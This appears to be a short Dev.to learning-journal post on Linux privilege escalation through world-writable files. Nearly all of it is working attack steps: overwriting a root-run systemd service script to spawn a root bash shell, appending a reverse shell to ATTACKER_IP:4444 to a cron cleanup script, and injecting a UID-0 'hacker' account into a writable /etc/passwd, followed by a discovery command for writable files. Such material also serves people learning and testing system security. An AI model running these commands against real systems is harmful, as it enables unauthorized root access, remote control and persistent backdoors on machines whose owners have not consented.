Day 29: Writable File Exploitation — Turning 'Bad Permissions' into Root Shells 🕵️‍♂️

Source: Dev.to

The “Writable‑to‑Root” Pipeline

1. The Systemd Service Hijack

I audited a custom service file in /etc/systemd/system/app.service.

Flaw: The ExecStart pointed to /opt/app.py, which was world‑writable (-rwxrwxrwx).

Exploit:

echo 'import os; os.system("/bin/bash")' > /opt/app.py

Trigger: systemctl restart app.
Since the service manager (systemd) runs as root, the injected Bash shell spawns with full root privileges.

Automation: I checked /etc/crontab and found a cleanup script running every minute.

Exploit (append reverse shell):

echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/cleanup.sh

Result: Within 60 seconds, the system automatically pushed a root shell to my listener.

/etc/passwd (The Nuclear Option)

In rare, critical misconfigurations where /etc/passwd is world‑writable:

Exploit: Create a new user hash.

openssl passwd -1 mypassword

Injection: Append the following line to /etc/passwd (replace $hash with the generated hash).

hacker:$hash:0:0:root:/root:/bin/bash

Result: su hacker provides an immediate root session without needing the actual root password.

“Gold Mine” Discovery Command

find / -writable -type f 2>/dev/null | grep -v "/proc"

Typical writable locations uncovered:

• /opt/ (custom applications)
• /usr/local/bin/ (custom scripts)
• /etc/systemd/system/ (service configs)
• /etc/cron* (scheduled tasks)

Follow my journey: #1HourADayJourney